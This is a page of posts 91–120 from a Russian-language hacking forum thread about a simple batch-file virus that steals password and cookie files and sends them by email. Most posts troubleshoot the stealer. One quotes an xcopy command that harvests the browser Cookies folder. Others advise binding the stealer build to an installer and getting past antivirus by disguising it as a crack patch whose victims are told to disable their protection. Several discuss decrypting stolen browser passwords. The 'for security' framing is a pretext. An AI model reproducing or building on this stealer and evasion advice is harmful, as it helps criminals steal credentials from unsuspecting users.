Инструкция взлома - Это пособия для безопасности!

Объявление

Hash Profit

Хочешь получить WMR бонус? Вот несколько рабочих WMR бонус программ, которые раздают бонусы за посещение их сайтов по 0.77 р., мало но каждый день что стоит кликать на кнопку и получать свой бонус, сколько накапает к примеру за месяц, за год?
worldwm
5-kopeek
icqmir
1 клик 1 wmr
3.03WMB

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.

Пример простого bat вируса,ворующего файлы с паролями.

Сообщений 91 страница 120 из 187

91

MOssWar
может это не тебе нужен но многим нужен
знайю что асм хороши но все же отстал
у нее нет графически интерфейс и еще сним писать трудно и не удовно
dev c++ был написн делфиом

0

92

а обязательно яндекс или можно маил

0

93

aza написал(а):

может это не тебе нужен но многим нужен
знайю что асм хороши но все же отстал
у нее нет графически интерфейс и еще сним писать трудно и не удовно

Программы написанные на asm работают быстрей чем написанные на делфи,имеют более меньший размер(в несколько раз меньше),на asm можно писать программы не только под Windows,а обсолютно под любую ОС,на asm можно написать то,чего на делфи не напишешь(ну по крайней мере на асме будет проще),
В чем он отстал?
В том что у тебя тямы не хватило?
HiAsm 4.4 build 184 с этим дети играются.
Вообщем дальнейшия дискусия будет безсмысленна,так что на этом мы и закончим.

0

94

у меня работает!!!!!!!!!!!

0

95

MOssWar если асм так крутой так напиши  как написать этот вирус на асме

0

96

aza а что там писать?)
Ты справочник открой,там всё написано.

0

97

MOssWar написал(а):

xcopy "%userprofile%\Cookies\*.*" "%SystemDrive%\pass\IE\ *.*" /k /q /s /e /h /y >nul
На счет пути хз,сейчас нету возможности в винду залезть.

так в самый раз))) спасибо я уже как раз разобрался )))

MOssWar написал(а):

на кой они нужны?)

ну....во первых на всякий случай, тож не помешает))) а во вторых, оказываеться все "начинающие" пользователи, в многих случаях через него сидят (ну по крайней мере люди, на которых проверял =)) )

еще раз ОГРОМНОЕ спасибо за помощь! ))

0

98

блин и у меня тоже ни чё не приходит!
чо делать?

0

99

Вот делал только строго по твоим правил,софт брал только у тя и вот что вышло:
http://s017.radikal.ru/i410/1112/11/0a7cb9e2ddab.jpg

0

100

нужна помощь не получается зделать этот вирус все как навидео зделал и нечего не приходит

0

101

BODI не косячнул где то))
однозначно.
Погляди повнимательней,Microsoft - это название файла которое указано на скрине в ошибке,а в вирусе ни где не встречается файлов с таким именем,эт ты напутал с именами и описанием файлов.
Внимательней.

---------------
terminator983495 телепаты в отпуске и то что ты пишешь что у тебя не получается нам ни о чем не говорит,следовательно и помочем тебе ни чем не сможем!)
Подробней,что именно и в чём у тебя не получается.

0

102

Ща попробую заноо.)
А вот ещё один вопрос если эту прогу "Smart Install Maker" использовать для других программ-ну просто как склейщик:
допустим у меня есть билд стилера я помощь этой программы так же склеиваю ее с чем нить другим,работать будет?

0

103

саздаю все как на видео не приходит на почту нечего не пароли не что как правильно написать куда должен распаковыватся архив

0

104

terminator983495  а ты не пробовал прочитать саму статью?
Там всё расписано,включая сам батинок.
За тебя та читать ни кто не будет.

0

105

почему у меня вылазит эта ошибка при запуске троя http://uploads.ru/t/7/5/j/75jbB.png

0

106

terminator983495 чё за имбицилизм?
От куда там Открытка.exe взялась?
Читай статью и делай так как там написано,без какой либо отсебячены.

0

107

зделайте мне не получается моя аська 618155846

0

108

terminator983495 прочитай статью,там всё описано и расписано,каждый мля шаг!
Как собрать всё в один исполняемый файл написано здесь Как склеивают вирусы с программами.

0

109

все получилось у себя проверил все приходит дал другу от него не идет не че почему

0

110

terminator983495 блокирует антивирус,фаервол.
Пихать склеиным с каким нибудь патчем,для какой нибудь программы и втирать в ухо что на момент запуска патча для того что бы прога крякнулась антивирус и фаервол вместе с брэндмауером были отключены.

0

111

люди какой прогой можно расшифровать пароли с браузера мультипасворд рековери не получатся кроме оперы она чет не че больше не орасшифровыват

0

112

terminator983495 с какого браузера?
Замени на свои и смотри.

0

113

terminator983495Multi Password Recovery ты это имел в виду это не браузер.

Смотри

Multi Password Recovery (сокр. MPR) - многофункциональное решение для Windows по расшифровке и тестировании паролей на стойкость. MPR автоматически находит и мгновенно расшифровывает пароли из более чем 110 популярных программ (FTP, E-mail клиенты, Интернет пейджеры, Браузеры и пр.), при этом, не требуя вмешательства пользователя. Кроме расшифровки, показывает пароли под здездочками, позволяет скопировать SAM файл, удалить сохраненные пароли, сгенерировать новый пароль, сохранить отчеты на жесткий диск.

Моё мнение програма не очень.

0

114

почему Password Recovery не расшифровывать пароли от мазилы в чем может быть причина

0

115

terminator983495 замени на свои и смотри в мозиле.
Password Recovery  уже не актуален,ну по крайней мере для большинства обновляемого софта.
Софт обнослвется,а алгоритм расшифровки в Password Recovery  не обновляется,вот и результат.

0

116

а как потом свои вастоновить

0

117

terminator983495 написал(а):

а как потом свои вастоновить

Угадай с трех раз)

0

118

terminator983495 ну ты сложный,а что нельзя сделать копии своих файлов?

0

119

MOssWarЧто то мне подсказывает что человек terminator983495 просто набивает себе посты  ну нереально такие вопросы задовать.

0

120

terminator983495
А ты что их удалить собрался?!
Ну флаг в руки!) как говорится на ошибках учатся!)))

0

Вы здесь » Инструкция взлома - Это пособия для безопасности! » Всё что касается вирусов. » Пример простого bat вируса,ворующего файлы с паролями.